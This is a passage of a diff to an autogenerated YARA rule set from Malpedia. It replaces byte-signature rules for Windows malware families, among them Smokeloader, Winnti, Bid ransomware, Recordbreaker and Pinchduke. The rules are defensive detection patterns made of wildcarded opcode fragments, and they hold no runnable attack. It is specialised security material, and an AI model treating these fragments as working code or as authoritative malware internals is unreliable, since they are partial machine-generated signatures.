+ reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.headertip" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.headertip_auto.yar#L1-L126" license_url = "N/A" - logic_hash = "73611f5253baf7f95cf22059dc76ddead3ab9941ef229c965d83aeede8e284a3" + logic_hash = "4007b2c1a7322a986be26c8429a660608ab1b4d0812b16868306a2db8cbc4c12" score = 75 quality = 75 tags = "FILE" @@ -130885,32 +133566,32 @@ rule MALPEDIA_Win_Pngdowner_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8b4508 c705????????01000000 50 a3???????? e8???????? 8db6bcdc4000 bf???????? } - $sequence_1 = { ff15???????? 85c0 a3???????? 741b 6a00 6a00 } - $sequence_2 = { 7552 833c8580e0400000 53 57 } - $sequence_3 = { c74050c0b54000 c7401401000000 c3 56 57 ff15???????? } - $sequence_4 = { c1ff05 83e11f 8b3cbd40e64000 8d0cc9 8d3c8f eb05 bf???????? } - $sequence_5 = { 83c8ff 5b 81c420000100 c3 8b3d???????? 8d4c2420 } - $sequence_6 = { ff74240c e8???????? 83c40c c3 e8???????? 8b4c2404 894814 } - $sequence_7 = { c3 33c0 5e c3 8b442404 c74050c0b54000 } - $sequence_8 = { 8b1d???????? b900400000 33c0 8d7c2420 8d542420 } - $sequence_9 = { ff742404 e8???????? 59 c3 56 8bf1 6a1b } + $sequence_0 = { 85c0 7434 8b07 ff4d08 03c3 56 } + $sequence_1 = { 57 ff15???????? 59 eb32 ffd6 } + $sequence_2 = { c645d274 c645d36f c645d472 c645d579 c645d657 885dd7 c645ac47 } + $sequence_3 = { c6458d75 c6458e65 c6458f72 c6459079 c645914f c6459270 c6459374 } + $sequence_4 = { 56 8d45ec 50 8d45f0 50 6813000020 } + $sequence_5 = { 894df4 8955fc f7c60000ffff 7513 81e6ffff0000 2b7010 } + $sequence_6 = { 03c6 ebea 56 8b742410 57 } + $sequence_7 = { 58 668945f8 6a32 58 668945fa 33c0 668945fc } + $sequence_8 = { ff15???????? a3???????? 3bc6 0f84c0000000 53 8d4df4 } + $sequence_9 = { 50 ff15???????? 83c414 56 b80013e084 50 56 } condition: - 7 of them and filesize <131072 + 7 of them and filesize <174080 } -rule MALPEDIA_Win_Montysthree_Auto : FILE +rule MALPEDIA_Win_Bid_Ransomware_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "5df0d300-da50-5a49-9998-41d773ee6c8b" + id = "123f6d77-eca2-5400-ac56-e3f30e76b796" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.montysthree" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.montysthree_auto.yar#L1-L119" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bid_ransomware" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.bid_ransomware_auto.yar#L1-L114" license_url = "N/A" - logic_hash = "00fdc41dcd00cadf758a1f9a8aa235f12bbf1e307fd238ef7d6a32ae7dd0988d" + logic_hash = "040b1903110ce367e4f39e634882ebba58d8e30bf0983ec0eaeaeca56a956f74" score = 75 quality = 75 tags = "FILE" @@ -130924,34 +133605,34 @@ rule MALPEDIA_Win_Montysthree_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ff15???????? 8bf0 3bf3 89754c } - $sequence_1 = { 8bd4 46 62807013e64e 13e6 d1b660d40c3e } - $sequence_2 = { 8d4d70 e8???????? ff30 687b020000 57 68???????? e8???????? } - $sequence_3 = { ff75f0 ffd6 8bc7 f7d8 } - $sequence_4 = { 50 bf00040000 57 ff15???????? 85c0 8d8574f7ffff 7405 } - $sequence_5 = { ff7508 53 ff15???????? 53 8d83080a0000 50 } - $sequence_6 = { 8d4d28 e8???????? 50 68???????? e8???????? } - $sequence_7 = { 8933 39753c 8b457c 8930 753d 39756c } - $sequence_8 = { e8???????? 8d8570fdffff 50 8d4dc4 } - $sequence_9 = { ff756c ff15???????? 8d4524 50 8d4d4c e8???????? eb25 } + $sequence_0 = { c705????????20202020 68???????? 50 e8???????? } + $sequence_1 = { 6a00 e8???????? ff75fc e8???????? c9 c3 } + $sequence_2 = { ff75b0 e8???????? ff75b0 e8???????? 6800800000 ff75a8 } + $sequence_3 = { 55 8bec 83c4f4 6800800000 6a40 } + $sequence_4 = { 881f 83c701 83f800 77e3 eb0e } + $sequence_5 = { 8b4d08 80c141 c745c05c5c3f5c 884dc4 c745c53a5c2a2e } + $sequence_6 = { 53 6a00 6a00 6a00 ff75e4 e8???????? } + $sequence_7 = { 8945f0 eb15 ff75f4 e8???????? } + $sequence_8 = { 68ea030000 ff35???????? e8???????? 8945fc } + $sequence_9 = { e8???????? 8b85acfdffff 83e001 7414 8b7508 } condition: - 7 of them and filesize <458752 + 7 of them and filesize <57344 } -rule MALPEDIA_Win_Smokeloader_Auto : FILE +rule MALPEDIA_Win_New_Ct_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "977bd971-8931-5636-8c4a-15a97d7d7052" + id = "d2add3a1-140a-5bb8-b61a-9a3c6a02e7fc" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.smokeloader_auto.yar#L1-L568" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.new_ct" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.new_ct_auto.yar#L1-L123" license_url = "N/A" - logic_hash = "1e0a8327807cdebec07ee883bf0e214c6531b2f2bf2969115a759b540a5a3955" + logic_hash = "d5abc4cf0e59662bf031f834b2da1a42e3067fae0164acdda49916fdb832ef21" score = 75 - quality = 50 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -130963,89 +133644,34 @@ rule MALPEDIA_Win_Smokeloader_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ff15???????? 8d45f0 50 8d45e8 50 8d45e0 50 } - $sequence_1 = { 57 ff15???????? 6a00 6800000002 6a03 6a00 6a03 } - $sequence_2 = { 50 8d45e0 50 56 ff15???????? 56 ff15???????? } - $sequence_3 = { 8bf0 8d45dc 50 6a00 53 ff15???????? } - $sequence_4 = { 740a 83c104 83f920 72f0 } - $sequence_5 = { e8???????? 8bf0 8d45fc 50 ff75fc 56 6a19 } - $sequence_6 = { ff15???????? bf90010000 8bcf e8???????? } - $sequence_7 = { 0fb64405dc 50 8d45ec 50 } - $sequence_8 = { 50 56 681f000f00 57 } - $sequence_9 = { 56 8d45fc 50 57 57 6a19 } - $sequence_10 = { 668ce8 6685c0 7406 fe05???????? } - $sequence_11 = { 8b07 03c3 50 ff15???????? } - $sequence_12 = { 56 ff15???????? 50 56 6a00 ff15???????? } - $sequence_13 = { 33c0 e9???????? e8???????? b904010000 } - $sequence_14 = { 88443c18 88543418 0fb64c3c18 0fb6c2 03c8 81e1ff000000 } - $sequence_15 = { 81e5ff000000 8a442c18 88443c18 47 } - $sequence_16 = { e8???????? 8bf8 68???????? ff15???????? } - $sequence_17 = { ebf5 55 8bec 83ec24 8d45f4 53 } - $sequence_18 = { 50 57 ff15???????? 43 83fb0f } - $sequence_19 = { 8b7d10 50 57 56 53 e8???????? } - $sequence_20 = { 8d8de8fdffff 50 50 50 } - $sequence_21 = { 8d95f0fdffff c70200000000 6800800000 52 51 6aff } - $sequence_22 = { 8985ecfdffff ffb5f0fdffff 50 53 e8???????? 8d8decfdffff } - $sequence_23 = { e8???????? 2500300038 005800 2500300038 } - $sequence_24 = { 8db5f8fdffff c60653 56 6a00 6a00 6a00 } - $sequence_25 = { 8b4514 898608020000 56 6aff } - $sequence_26 = { 01d4 8d85f0fdffff 8b750c 8b7d10 50 57 } - $sequence_27 = { fc 5f 5e 5b } - $sequence_28 = { 89e5 81ec5c060000 53 56 } - $sequence_29 = { 30d0 aa e2f3 7505 } - $sequence_30 = { 89cf fc b280 31db a4 } - $sequence_31 = { 60 89c6 89cf fc } - $sequence_32 = { ff15???????? 85c0 747c 488b4c2448 4533c9 488d442440 } - $sequence_33 = { 488b4547 488907 4885c9 740f 8b450f 48894d17 83c802 } - $sequence_34 = { 33c9 e8???????? 488bd8 4584ff 7411 41b101 } - $sequence_35 = { 4f 8d1c10 41 8b4b18 45 } - $sequence_36 = { 01c4 ffc9 49 8d3c8c } - $sequence_37 = { 4c 01c7 8b048f 4c } - $sequence_38 = { 49 8d3c8c 8b37 4c 01c6 } - $sequence_39 = { 41b104 448bc7 488bcb e8???????? 488b742440 488bc3 488b5c2430 } - $sequence_40 = { 55 89e5 81ec54040000 53 } - $sequence_41 = { 33c9 4c897c2428 c744242000a00f00 ff15???????? } - $sequence_42 = { 8b4b18 45 8b6320 4d } - $sequence_43 = { 89d0 c1e205 01c2 31c0 ac 01c2 85c0 } - $sequence_44 = { 83c408 85c0 0f84cb000000 8b45f4 2d10bf3400 0fb74dec } - $sequence_45 = { 8946fc ad 85c0 75f3 c3 56 } - $sequence_46 = { 56 ad 01e8 31c9 c1c108 3208 } - $sequence_47 = { 8b4da0 8b55a4 895148 689d1e6b63 8b45e4 50 } - $sequence_48 = { 8b45b4 894220 eb10 8b8d78ffffff 8b11 899578ffffff ebae } - $sequence_49 = { 03471c 8b0428 01e8 5e c3 } - $sequence_50 = { 5b c9 c20800 55 89e5 83ec04 } - $sequence_51 = { e8???????? 8945ac 6a00 6a04 8d45b4 50 } - $sequence_52 = { aa e2f3 7506 7404 } - $sequence_53 = { 55 8bec 83c4d0 1e 53 } - $sequence_54 = { 684a0dce09 8b45e4 50 e8???????? 8945a8 8b4da0 8b55a8 } - $sequence_55 = { 83ec0c e8???????? 8945f8 8b45f8 8b4860 894df4 ff7518 } - $sequence_56 = { 803800 75f5 31d1 75ec } - $sequence_57 = { 8b450c 2d10bf3400 8b4d08 c1e103 } - $sequence_58 = { 8b55f8 0fb70a c1e103 33d2 f7f1 8945fc } - $sequence_59 = { 5e c3 60 89c6 } - $sequence_60 = { 9a18a15c5d5d5d d6 0055d0 08a50f375d37 } - $sequence_61 = { 48 35f94e5d5d d6 59 79de 99 } - $sequence_62 = { 5d 5d b658 1f 79b6 a888 } - $sequence_63 = { 0055d0 08a50f375d37 5d 37 } - $sequence_64 = { 5d 5d 285829 5e cb } + $sequence_0 = { 894304 7532 8bfe 83c9ff 33c0 f2ae f7d1 } + $sequence_1 = { 7472 3c42 746e 33c0 } + $sequence_2 = { 81ec00040000 53 56 6888030000 33db } + $sequence_3 = { 7605 b800000100 8b742418 03c7 8d8c24bc070000 8d44301c } + $sequence_4 = { c644240537 c644240679 c6442407b9 7627 } + $sequence_5 = { 8bcd 8933 2bce c6043e00 49 33c0 } + $sequence_6 = { 50 6a00 6a00 68???????? 6a00 68???????? ff15???????? } + $sequence_7 = { 33c0 8dbc24bd070000 c68424bc07000000 c68424bc0f000000 f3ab 66ab aa } + $sequence_8 = { 740d 8d942414020000 52 ffd0 83c404 5f 5e } + $sequence_9 = { 8bbc245c040000 c1e902 f3a5 8bc8 83e103 f3a4 } condition: - 7 of them and filesize <245760 + 7 of them and filesize <122880 } -rule MALPEDIA_Win_Winnti_Auto : FILE +rule MALPEDIA_Win_Sparrow_Door_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "3bce81c4-b806-55af-b179-e7a33535f793" + id = "0be52ebd-81b0-5548-b0c4-71d664335291" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.winnti" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.winnti_auto.yar#L1-L247" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sparrow_door" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.sparrow_door_auto.yar#L1-L124" license_url = "N/A" - logic_hash = "bb0b6cf106deb97c4eb44fec946685f152141bb95569eea2bec56d5f75cb75c8" + logic_hash = "a3ea16377775f10fb390048ca81fb5b622cc57fa7d5b14e32fa13a939a085057" score = 75 - quality = 73 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -131057,46 +133683,32 @@ rule MALPEDIA_Win_Winnti_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 51 52 8bce e8???????? 53 8bf8 ff15???????? } - $sequence_1 = { ff15???????? 663dffff 747b 663dfeff 7475 8b942494020000 83c9ff } - $sequence_2 = { c22000 8b4d00 56 6a03 68c8000000 51 ff15???????? } - $sequence_3 = { 8bf0 83c404 85f6 7509 5f 5e 83c8ff } - $sequence_4 = { 807a025c 75bf 83c203 8a0a 56 33f6 b801000000 } - $sequence_5 = { 895e08 895e0c ffd7 50 } - $sequence_6 = { 83c404 85db 0f84da000000 55 8b6c2430 56 57 } - $sequence_7 = { 6a01 52 6a02 8974243c 89742430 c644244800 ff15???????? } - $sequence_8 = { 488d8a40000000 e9???????? 488b8a40000000 4883c108 e9???????? 488b8a80000000 e9???????? } - $sequence_9 = { 48037c2470 48897c2478 488b8c2400010000 4885c9 741f 4183fe01 7513 } - $sequence_10 = { 4c8d25b6f10000 498b0c24 4d8bc5 488bd3 e8???????? 85c0 } - $sequence_11 = { 4803f7 4c03f7 41ffca 660f1f840000000000 478d0c1a } - $sequence_12 = { 75f8 488d15e1160000 b12e 482bd0 } - $sequence_13 = { 4963f9 48897db7 453bc5 0f8e4f020000 418bc0 412bc5 448be0 } - $sequence_14 = { 3918 0f4c18 3bcb 0f8d87000000 488d3d979c0a00 ba58000000 488bcd } - $sequence_15 = { 4c2bc1 0f1f00 410fb6440801 8811 } - $sequence_16 = { 4d85ed 7429 488d15fcd70a00 498bcd } - $sequence_17 = { 4c8bc7 48894768 488d4567 ba18822200 } - $sequence_18 = { 4889542410 53 4881ecb0000000 33db } - $sequence_19 = { 488d542450 4438742450 740a 6690 48ffc2 } - $sequence_20 = { 488d1debad0000 488d3d64ae0000 eb0e 488b03 4885c0 7402 } - $sequence_21 = { 8a45d9 4b8b8cf800a20b00 88443139 4b8b84f800a20b00 8854303a eb4c 493bde } - $sequence_22 = { 57 4156 4157 4883ec30 4c8bf1 33ff } - $sequence_23 = { 44895c391c 4963cb 488bd1 48c1fa10 498b8680000000 } + $sequence_0 = { 395c240c 7551 8b5604 8b3d???????? 52 68???????? } + $sequence_1 = { 57 56 ff15???????? 85c0 0f8491010000 8b44243c 3bc5 } + $sequence_2 = { 8d8c2440040000 51 55 8d94243c010000 52 6a00 68e9fd0000 } + $sequence_3 = { 53 50 8bf1 895c2430 895c2438 889c244c060000 } + $sequence_4 = { 8d44245c 50 e8???????? 83c420 85c0 } + $sequence_5 = { a1???????? a3???????? a1???????? c705????????05772a00 8935???????? } + $sequence_6 = { e8???????? 8d542470 52 8d442448 50 8b84249c010000 } + $sequence_7 = { 50 895c2438 c744244844000000 898c2480000000 c744247401010000 6689542478 889c2490000000 } + $sequence_8 = { 894c2418 8954241c 3bc3 7555 } + $sequence_9 = { 8d8c2400010000 51 56 52 ffd5 85c0 74a8 } condition: - 7 of them and filesize <1581056 + 7 of them and filesize <155648 } -rule MALPEDIA_Win_Advisorsbot_Auto : FILE +rule MALPEDIA_Win_Recordbreaker_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "4423ed68-193a-5b69-9a0c-e4a68868d775" + id = "242c0c11-6eb0-5e72-beaa-aa71c863ae8a" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.advisorsbot" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.advisorsbot_auto.yar#L1-L169" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.recordbreaker" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.recordbreaker_auto.yar#L1-L114" license_url = "N/A" - logic_hash = "63e408f2b85153604b6cbce7b119689dceb4fed854cd697bc92427d51dad5ae1" + logic_hash = "600e9d6aeb0913499891accea4667949930b0cff9e2a09c3687c79439815914b" score = 75 quality = 75 tags = "FILE" @@ -131110,41 +133722,32 @@ rule MALPEDIA_Win_Advisorsbot_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8bc1 2bc2 d1e8 03c2 c1e808 } - $sequence_1 = { 8bc2 33d2 c1e809 f7f1 } - $sequence_2 = { 8bc2 33d2 c1e808 f7f1 } - $sequence_3 = { b89b01a311 f7e1 2bca d1e9 03ca } - $sequence_4 = { d1e8 03c2 33d2 c1e809 } - $sequence_5 = { 8bc2 c1e809 33d2 f7f1 } - $sequence_6 = { 8b442408 8b4c2408 33d2 f7f1 } - $sequence_7 = { d1e9 03ca 33d2 c1e909 } - $sequence_8 = { d1e9 03ca c1e907 2bc1 } - $sequence_9 = { b839811338 f7e1 8bc1 2bc2 } - $sequence_10 = { d1e9 03ca c1e909 33c8 } - $sequence_11 = { 8bc2 33d2 c1e804 f7f1 } - $sequence_12 = { 8bca f7e2 8bc1 2bc2 } - $sequence_13 = { 668b4c2410 5f 5e 5d } - $sequence_14 = { 0fb7c1 0fb7ca 33d2 f7f1 } - $sequence_15 = { 0fb7c0 0fb7c9 33d2 f7f1 } - $sequence_16 = { 0fb6c0 0fb6c9 33d2 f7f1 } - $sequence_17 = { 8b442414 8b4c2414 33d2 f7f1 } - $sequence_18 = { 5e 5d 0fb7c2 5b } + $sequence_0 = { 2bf7 8bcf d1fe 56 53 e8???????? } + $sequence_1 = { 42 66890c38 8d0412 0fb70c30 663bcb } + $sequence_2 = { 59 85c0 7408 6afe } + $sequence_3 = { 6a02 ff75fc ff15???????? 6a03 ff75fc ff15???????? 6a04 } + $sequence_4 = { 8bd7 8bc8 e8???????? 8b15???????? 8bc8 e8???????? 8bd3 } + $sequence_5 = { 6a1a 53 6a00 8bf8 } + $sequence_6 = { 881e 46 49 83ea01 } + $sequence_7 = { 8b15???????? 8bc8 e8???????? 8b55ec } + $sequence_8 = { 2bc6 d1f8 56 8d3c46 33c0 } + $sequence_9 = { 8b4d0c 8b07 5f 5e } condition: - 7 of them and filesize <434176 + 7 of them and filesize <232312 } -rule MALPEDIA_Win_Nim_Blackout_Auto : FILE +rule MALPEDIA_Win_Bughatch_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "5ee8f0fb-bcc5-57f1-899f-f87f9c8f8cd3" + id = "35614cb3-a7b5-53cc-adaa-ae210fa4a880" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nim_blackout" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.nim_blackout_auto.yar#L1-L131" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bughatch" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.bughatch_auto.yar#L1-L127" license_url = "N/A" - logic_hash = "38658558791a84132e6c1e0a028a41bbfaac44e317840b869e572ec902a09080" + logic_hash = "5b28b48c5896cf30a835a51ee080a086478b951d2bf5768e0498fb91c61b534d" score = 75 quality = 75 tags = "FILE" @@ -131158,32 +133761,32 @@ rule MALPEDIA_Win_Nim_Blackout_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 4889c8 83e001 84c0 7405 e8???????? 488b45f0 4885c0 } - $sequence_1 = { 48c7401800000000 e9???????? 90 48c745e0c6000000 488d057d5c0200 488945e8 } - $sequence_2 = { 488d057ad80000 488905???????? 488d05d85b0200 488905???????? c605????????01 48c705????????60000000 } - $sequence_3 = { e8???????? 48c745e0e7000000 488d05c37e0200 488945e8 488b4510 488b00 ba08000000 } - $sequence_4 = { e9???????? 90 48c785a800000000000000 48c785a000000000000000 48c7450088010000 488d05885b0100 48894508 } - $sequence_5 = { 488945c8 488b4de8 488b55e0 4889d0 4801c0 4801d0 48c1e003 } - $sequence_6 = { 488b1402 4889c8 4801c0 4801c8 48c1e004 4889c1 } - $sequence_7 = { 488d0542460200 488945c8 488b4510 488b55f8 4889d1 48c1e105 488b55f0 } - $sequence_8 = { 488b4588 488945f0 eb49 90 48c745d033000000 488d05f48e0100 488945d8 } - $sequence_9 = { 48894508 48c785f800000000000000 48c7450084010000 488d05bf5c0100 48894508 4883bdf000000000 0f84ff000000 } + $sequence_0 = { 51 ff15???????? 68???????? 8d9594f7ffff 52 ff15???????? } + $sequence_1 = { 8d8594f7ffff 50 ff15???????? c745d80c000000 c745e001000000 c745dc00000000 8d4d94 } + $sequence_2 = { 52 6a00 8b45f8 50 ff15???????? 8945ec 837dec00 } + $sequence_3 = { 55 8bec 81ec30010000 c745e000000000 c745e860524000 } + $sequence_4 = { 894df4 8d55e4 52 8d4594 50 6a00 6a00 } + $sequence_5 = { 8b55ec 52 ff15???????? c745f801000000 8b45fc } + $sequence_6 = { 7308 8b45f8 8945f0 eb06 8b4d14 894df0 8b55f0 } + $sequence_7 = { ff15???????? 8b4de0 51 ff15???????? 8b45dc } + $sequence_8 = { 55 8bec 81ec60030000 837d0800 0f84d2000000 6a44 6a00 } + $sequence_9 = { e8???????? 83c40c 85c0 7407 c745fc01000000 8b45f8 50 } condition: - 7 of them and filesize <1068032 + 7 of them and filesize <75776 } -rule MALPEDIA_Win_Dairy_Auto : FILE +rule MALPEDIA_Win_Pickpocket_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "6e188396-140d-58db-bd0e-fbec36fd2177" + id = "9a488247-9e86-5930-98a0-6918c231e819" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dairy" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.dairy_auto.yar#L1-L126" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pickpocket" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.pickpocket_auto.yar#L1-L111" license_url = "N/A" - logic_hash = "549c203eee4759a62625d82431309a24967248eb704aef7aff9b67e4e84189f3" + logic_hash = "d7990d44202646b62032b82a90fb7e07e373731a34449c62076ef24e8ce04d57" score = 75 quality = 75 tags = "FILE" @@ -131197,32 +133800,32 @@ rule MALPEDIA_Win_Dairy_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 5b 81c48c050000 c3 668b15???????? } - $sequence_1 = { 68???????? 52 e8???????? 83c40c 85c0 752e } - $sequence_2 = { 83c408 8bc6 5f 5e 5d 81c424030000 c3 } - $sequence_3 = { be01000000 5b 57 ff15???????? 55 e8???????? 83c404 } - $sequence_4 = { 8d542418 52 57 e8???????? 85c0 7414 6a00 } - $sequence_5 = { 4b 81cb00fcffff 43 2bc3 } - $sequence_6 = { 85c0 0f8ef6000000 8b550c 53 56 52 e8???????? } - $sequence_7 = { f3a5 8bca 8d54243c 83e103 f3a4 83c9ff } - $sequence_8 = { 49 51 8d8c2408010000 51 53 e8???????? 83c40c } - $sequence_9 = { 81e3ff030080 7908 4b 81cb00fcffff 43 2bc3 33ff } + $sequence_0 = { 85c0 750f b962890100 e8???????? } + $sequence_1 = { 7e1e b9dccc0000 e9???????? b9cecc0000 e9???????? b9c7cc0000 } + $sequence_2 = { 7404 8b01 eb03 83c8ff 83f804 } + $sequence_3 = { d3e0 a846 750f b99be00100 e8???????? e9???????? } + $sequence_4 = { e8???????? 85c0 750e b958de0100 } + $sequence_5 = { 85c0 750e b958de0100 e8???????? 8bc8 } + $sequence_6 = { 85c0 740f b989000100 e8???????? } + $sequence_7 = { 7e16 b91bcc0000 eb05 b916cc0000 } + $sequence_8 = { eb0c b96ccb0000 eb05 b960cb0000 } + $sequence_9 = { eb09 8bc7 eb0a b9a9d60000 e8???????? } condition: - 7 of them and filesize <212992 + 7 of them and filesize <1458176 } -rule MALPEDIA_Win_Roopy_Auto : FILE +rule MALPEDIA_Win_Pinchduke_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "18fd31da-7cad-5b5e-9e3e-b0b112556109" + id = "cba434ff-ad3f-569d-a5ea-a8661b7af309" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.roopy" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.roopy_auto.yar#L1-L127" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pinchduke" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.pinchduke_auto.yar#L1-L131" license_url = "N/A" - logic_hash = "6efa923735d84ae0bbc14d021be45ac1298053ce08c8f542f6e92d8a3dac3a28" + logic_hash = "91b75415e43b3618cf4d35265fc79e44823a3f174f6cf370c8d280ecd6905acb" score = 75 quality = 75 tags = "FILE" @@ -131236,32 +133839,32 @@ rule MALPEDIA_Win_Roopy_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8d45d8 30c9 6631d2 e8???????? 6a00 8b45ec 8945c0 } - $sequence_1 = { 89e5 8da42478fdffff 53 56 8945fc } - $sequence_2 = { 68???????? 64ff30 648920 8d431c 8b55fc e8???????? 89d8 } - $sequence_3 = { 85db 7403 8b40fc 3d04010000 0f8e91000000 89da } - $sequence_4 = { e9???????? 8d8decfeffff 8d95a0fcffff b810010000 e8???????? e8???????? } - $sequence_5 = { c745f800000000 c7859cfeffff00000000 c78598feffff00000000 c78594feffff00000000 c78578fdffff00000000 c7857cfdffff00000000 c78580fdffff00000000 } - $sequence_6 = { e8???????? 6a00 a1???????? 8945d8 } - $sequence_7 = { 30d2 e8???????? 6a00 8d45e4 e8???????? 6a00 a1???????? } - $sequence_8 = { e8???????? 8d8d8cfcffff 6631d2 8d8570fbffff e8???????? 8d858cfcffff 30c9 } - $sequence_9 = { 8b45dc 8d70ff f745e401000000 740d f745dcffffffff 0f856fffffff 8b45f0 } + $sequence_0 = { 6a01 895dd4 895dd8 895ddc c645e030 895de1 } + $sequence_1 = { 9b d93c24 9b 58 50 80e4f3 80cc08 } + $sequence_2 = { 85d2 7416 8d4c50fe 2bf0 57 668b3c0e 668939 } + $sequence_3 = { 83c40c 8d857bffffff 50 8d4dc4 e8???????? 8d8d7bffffff e8???????? } + $sequence_4 = { 50 ff15???????? 3bc3 89456c 0f84cc020000 } + $sequence_5 = { 8945fc e8???????? 83c410 ff75fc 56 ff15???????? 56 } + $sequence_6 = { 64a118000000 3e8b4030 3e0fb64002 890424 8b0424 59 c3 } + $sequence_7 = { 6a00 ff7510 ff75fc ffd6 85c0 7404 33c0 } + $sequence_8 = { 85d2 75f5 8bc7 5f 5e c3 8b4c240c } + $sequence_9 = { e8???????? 8d85e4f7ffff 50 e8???????? 83ec0c 8bcc 50 } condition: - 7 of them and filesize <739328 + 7 of them and filesize <223680 } -rule MALPEDIA_Win_Atmii_Auto : FILE +rule MALPEDIA_Win_Amtsol_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "a3746494-2207-5da0-bb5a-0a2c92906b78" + id = "c4e6651d-976c-58ca-adc5-c02364c8423a" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.atmii" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.atmii_auto.yar#L1-L170" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.amtsol" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.amtsol_auto.yar#L1-L128" license_url = "N/A" - logic_hash = "32f9cc90bb902f5f085ec60f456bf3e42304f21478253b8a2c4851a4d1f531ad" + logic_hash = "27d50e01d30776676c026a6886e9d6b54d3f1024ee993525160ca52cbcf77c05" score = 75 quality = 75 tags = "FILE" @@ -131275,38 +133878,32 @@ rule MALPEDIA_Win_Atmii_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 6a03 68000000c0 8b0d???????? 51 ff15???????? 8945fc } - $sequence_1 = { 8945ee 0fb705???????? 52 682e010000 50 895dd9 } - $sequence_2 = { 68???????? 50 ffd7 8d9dfcfbffff } - $sequence_3 = { 8d8dd1f9ffff 51 8895c4f9ffff ff15???????? } - $sequence_4 = { 8d95fcfdffff 6a00 52 e8???????? 8b35???????? 83c424 68???????? } - $sequence_5 = { 8945fc 837dfc00 7454 8b4dfc 0fb611 } - $sequence_6 = { 51 e8???????? 8b55f4 83c414 6a00 } - $sequence_7 = { 83c414 8d9df8fcffff e8???????? 8b45f8 85c0 7407 } - $sequence_8 = { 68???????? 68c3000000 8d85f8fcffff 68???????? 50 } - $sequence_9 = { 5f 5b 8be5 5d c3 68???????? 680b010000 